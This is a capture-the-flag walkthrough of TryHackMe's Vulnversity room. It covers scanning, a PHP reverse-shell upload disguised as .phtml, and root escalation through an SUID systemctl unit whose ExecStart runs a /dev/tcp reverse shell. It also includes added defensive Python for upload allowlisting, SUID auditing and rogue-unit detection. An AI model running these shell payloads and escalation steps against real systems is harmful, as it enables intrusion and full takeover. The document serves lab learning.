Linux Privilege Escalation – Walkthrough
Hello there, welcome to our walkthrough of the “Vulnversity” room on TryHackMe. Here is the link to the room: https://tryhackme.com/room/vulnversity. For this room you can use the AttackBox, which is straightforward, or connect through OpenVPN; if you are not familiar with connecting via OpenVPN, please visit https://tryhackme.com/room/openvpn.
What is expected of the Room?
The room falls under the basic computer exploitation category on TryHackMe. It is meant to equip you with the skills needed for active reconnaissance, basic web application attacks and, most importantly, privilege escalation.
[Task 1] Machine Deployment
We will use this machine to perform our attacks for the given tasks.
[Task 2] Reconnaissance
We need to gather information on the target machine, and what better place to begin than an Nmap scan of the box? (The machine IP is the one provided by the room.)
(# 1) Run an Nmap scan with the arguments given below and count the number of open ports.
nmap -sV -T4 <machine ip>
- -sV = probes the open ports to determine the service and version running on each
- -T4 = timing template (aggressive), which speeds up the scan
(# 2) Check the version of the Squid proxy that is running and submit your answer.
nmap -sV <machine ip>
(# 3) The -p-400 option tells Nmap which ports to scan; here it scans ports 1 through 400. For more information on this, check the Nmap manual.
(# 4) The same manual tells us what the -n flag skips: DNS resolution.
(# 5) The earlier Nmap scan already hints at the operating system, but we can also use the -O flag to have Nmap fingerprint the OS directly.
(# 6) Make sure you know what web servers are and which ones are commonly used in order to answer this question. To get the port the web server is running on, simply check the results of our first Nmap scan.
[Task 3] Locating directories using GoBuster
Now we are going to use gobuster, a directory discovery tool that brute-forces hidden directories. It is pre-installed in Kali, but in case it is not, you can install it with sudo apt-get install gobuster or sudo apt install gobuster depending on your Kali version. On Kali, wordlists are normally located under the /usr/share/wordlists folder.
To find the directory containing the upload form page, run the gobuster command listed below:
gobuster dir -u http://<machine IP>:3333 -w <wordlist path>
To confirm we have the right directory, load the folder path in the browser; the upload form should appear.
[Task 4] Compromising Web Server
Now that we have found the upload form, we can move to the next task, which is to compromise the server.
(# 1) We are required to test which file extensions can be uploaded, for example .txt, .html, .md, .php and others, to find the one that cannot be uploaded. This is called fuzzing.
(# 2) Create a list of the file extensions given in the room. This can be done in three easy steps:
touch <file_name> – creates the file
echo '<content>' > <file_name> – writes the content to the file
cat <file_name> – reads the file back
We are going to use Burp Intruder to automate the fuzzing. Go to the Proxy tab in Burp and make sure it is configured to intercept your browser traffic.
Upload a file through the form, intercept the request, right-click and send it to Intruder. Under Payloads, click Load and choose the file in which you saved your extensions.
In the Positions tab, find the filename and “Add §” around the extension.
Ensure that the attack type is Sniper and click Start attack.
(# 1) Now that we know which extension our payload can use, we are going to create a reverse shell.
- Download the PHP reverse shell here: https://github.com/pentestmonkey/php-reverse-shell/blob/master/php-reverse-shell.php
- Edit the downloaded file: set the IP to the one provided in the room (your tun0 IP) and, if you wish, change the port number. In this case we will just use port 1234.
- Rename the file to <file_name>.phtml
- Listen for incoming connections with netcat: nc -lvnp <your_port>
- Upload the shell and browse to http://<ip>:3333/internal/uploads/<file_name>.phtml to execute your payload.
- You should now have a shell in your netcat session.
(# 2) To find out who manages the server, list the users on the box.
(# 3) To get the first flag, we need to go to the home directory of the user bill:
cd /home/bill – go to bill’s home folder
ls – list the files and folders there
cat <file_name.txt> – read the file to get the flag
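The upload filter on this box rejects .php but lets .phtml through, which is the classic blacklist failure. As an added example (not the room's or the original post's code; the function names and the allowed-extension set are constructed for illustration), here is that kind of blacklist check beside an allowlist check that refuses anything it was not explicitly told to accept:

```python
import os.path

# Extensions the upload feature legitimately needs (constructed for this example).
ALLOWED_EXTENSIONS = {".jpg", ".png", ".pdf", ".txt"}


def blacklist_check(filename: str) -> bool:
    """Weak filter of the kind seen in the room: refuse only '.php'.
    Every other name passes, including '.phtml', which the web server
    still hands to the PHP interpreter."""
    _, ext = os.path.splitext(filename)
    return ext.lower() != ".php"


def allowlist_check(filename: str) -> bool:
    """Hardened filter: accept a bare filename with exactly one extension,
    and only if that extension is on the allow list. Anything unknown,
    including '.phtml', is refused without needing a rule for it."""
    base = os.path.basename(filename)
    if base != filename or base in ("", ".", ".."):
        return False          # directory components are never acceptable
    stem, ext = os.path.splitext(base)
    if not stem or "." in stem:
        return False          # refuse empty stems and stacked extensions
    return ext.lower() in ALLOWED_EXTENSIONS


def accepted(filenames, check) -> list:
    """Run one of the checks over a batch of candidate names and return
    the names it would accept, in their original order."""
    return [name for name in filenames if check(name)]


# Constructed sample: the extensions fuzzed in the room plus the .phtml shell.
SAMPLE_NAMES = ["test.txt", "test.html", "test.md", "test.php",
                "shell.phtml", "SHELL.PHP", "notes.txt.phtml"]

if __name__ == "__main__":
    print("blacklist accepts:", accepted(SAMPLE_NAMES, blacklist_check))
    print("allowlist accepts:", accepted(SAMPLE_NAMES, allowlist_check))
```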
[Task 5] Privilege Escalation
Now that we have a shell as a low-privileged system user, we are going to escalate our privileges in order to become the root user.
SUID is a file permission that allows a user to run a file or program temporarily with the permissions of the file’s owner.
(# 1) We are expected to search for SUID files and see what stands out:
find / -perm /4000 2> /dev/null
We notice /bin/systemctl, which is interesting not only because it controls services but because, with the SUID bit set, any user can run it with the permissions of its owner, root.
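From the defender's side, the lesson of this finding is to know which SUID binaries belong on a box and to alarm on any that do not. As an added example (not from the room or the original post), this script does what the find command above does and diffs the result against a baseline; the baseline set and the sample tree it builds are constructed for illustration.

```python
import os
import stat
import tempfile

# SUID binaries expected on the box (constructed for this example; a real
# baseline is recorded from a clean install of the same image).
EXPECTED_SUID = {"/usr/bin/passwd", "/usr/bin/sudo", "/bin/su",
                 "/bin/mount", "/bin/umount"}


def find_suid(root):
    """Equivalent of `find <root> -perm /4000`: every regular file under
    root whose set-user-ID bit is set. Symlinks are not followed."""
    found = set()
    for dirpath, _dirs, filenames in os.walk(root):
        for name in filenames:
            path = os.path.join(dirpath, name)
            try:
                st = os.lstat(path)
            except OSError:
                continue        # vanished or unreadable: skip, as 2>/dev/null does
            if stat.S_ISREG(st.st_mode) and st.st_mode & stat.S_ISUID:
                found.add(path)
    return found


def audit_suid(root, baseline):
    """SUID files under root that are not in the baseline, reported as paths
    relative to root so a mounted image can be audited like a live system."""
    found = {"/" + os.path.relpath(p, root) for p in find_suid(root)}
    return sorted(found - baseline)


def build_sample_tree():
    """Construct a throwaway tree mimicking the box: systemctl carries the
    unexpected SUID bit, passwd the expected one, ls none at all."""
    root = tempfile.mkdtemp()
    layout = {"bin/systemctl": 0o4755, "usr/bin/passwd": 0o4755, "bin/ls": 0o755}
    for rel, mode in layout.items():
        path = os.path.join(root, rel)
        os.makedirs(os.path.dirname(path), exist_ok=True)
        with open(path, "w") as fh:
            fh.write("#!/bin/sh\n")     # placeholder body, constructed
        os.chmod(path, mode)
    return root


if __name__ == "__main__":
    print(audit_suid(build_sample_tree(), EXPECTED_SUID))   # ['/bin/systemctl']
```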
(# 2) To get the final flag, we need to escalate our privileges to become root. To do this, we are going to create a ‘.service’ file that, when started, gives us a shell running as root.
- First we need to create a file with the extension ‘.service’, e.g. file.service, and copy the following into it. This unit, when started, runs bash as root and connects back to our listener, giving us a reverse shell:
[Unit]
Description=root

[Service]
Type=simple
User=root
ExecStart=/bin/bash -c 'bash -i >& /dev/tcp/<your_tun0_ip>/4455 0>&1'

[Install]
WantedBy=multi-user.target
- Since we cannot paste this directly into our existing reverse shell, we host it from our local machine using the command python3 -m http.server <port_no>.
- We then download it from the existing shell. If we try this from where we are presently, /home/bill, we get a permission error because our shell does not run as bill, so we cd /tmp and download it from there; /tmp is writable by every user.
- Once the download succeeds, we have to enable the service before we can start it. Note that systemctl enable <file_name>.service gives an error, so we have to use the full path:
systemctl enable /tmp/<file_name>.service
- Start a listener on the same port number that we used inside the ‘.service’ file.
- Once the listener is up, start the service:
systemctl start <file_name>.service
- This gives us a reverse shell as root on our listener.
Whoohoo!! We are now root; now we just need to find our second flag.
cd to root’s home directory and list everything to see what is there. Read the root.txt file and sure enough it is our second flag.
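Two things in the procedure above leave a footprint a defender can look for: a unit enabled from /tmp rather than one of the standard unit directories, and an ExecStart= that opens /dev/tcp and runs an interactive shell. As an added example (not from the room or the original post), this checker parses a unit file and reports those indicators; the two sample units and the address in them are constructed for illustration.

```python
import re

# Directories systemd normally loads units from; anything else is worth a look.
UNIT_DIRS = ("/etc/systemd/system/", "/lib/systemd/system/",
             "/usr/lib/systemd/system/", "/run/systemd/system/")

# ExecStart= patterns no legitimate service on this box should need
# (constructed for the example; a production ruleset would be broader).
SUSPICIOUS_EXEC = [
    (re.compile(r"/dev/(tcp|udp)/"), "ExecStart opens a network socket via /dev/tcp"),
    (re.compile(r"\b(ba)?sh\s+-i\b"), "ExecStart launches an interactive shell"),
]

def parse_unit(text):
    """Minimal systemd unit parser: {section: {key: [values]}}.
    Keys may repeat (several ExecStart= lines), so values are lists."""
    sections, current = {}, None
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith(("#", ";")):
            continue
        if line.startswith("[") and line.endswith("]"):
            current = line[1:-1]
            sections.setdefault(current, {})
        elif "=" in line and current is not None:
            key, _, value = line.partition("=")
            sections[current].setdefault(key.strip(), []).append(value.strip())
    return sections

def inspect_unit(path, text):
    """Findings for one unit file; an empty list means no rule fired."""
    findings = []
    if not path.startswith(UNIT_DIRS):
        findings.append(f"unit loaded from non-standard location {path}")
    service = parse_unit(text).get("Service", {})
    for cmd in service.get("ExecStart", []):
        findings.extend(why for pattern, why in SUSPICIOUS_EXEC if pattern.search(cmd))
    if findings and service.get("User", ["root"])[-1] == "root":
        findings.append("service runs as root")  # systemd's default when User= is absent
    return findings

# Constructed samples: the unit from this walkthrough (address made up) and a benign one.
ROGUE_UNIT = ("/tmp/root.service", "[Unit]\nDescription=root\n[Service]\nType=simple\n"
              "User=root\nExecStart=/bin/bash -c 'bash -i >& /dev/tcp/10.0.0.5/4455 0>&1'\n"
              "[Install]\nWantedBy=multi-user.target\n")
BENIGN_UNIT = ("/lib/systemd/system/cron.service",
               "[Unit]\nDescription=Regular background program processing daemon\n"
               "[Service]\nExecStart=/usr/sbin/cron -f\n[Install]\nWantedBy=multi-user.target\n")
```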
What is hacking without having a bit of fun? Do you think we can change the password for the root user? There is only one way to find out: go ahead and try it.
Hehe, that was relatively easy; now you try to change bill’s password. We hope you learnt something new and had fun doing it. Until next time, adios!!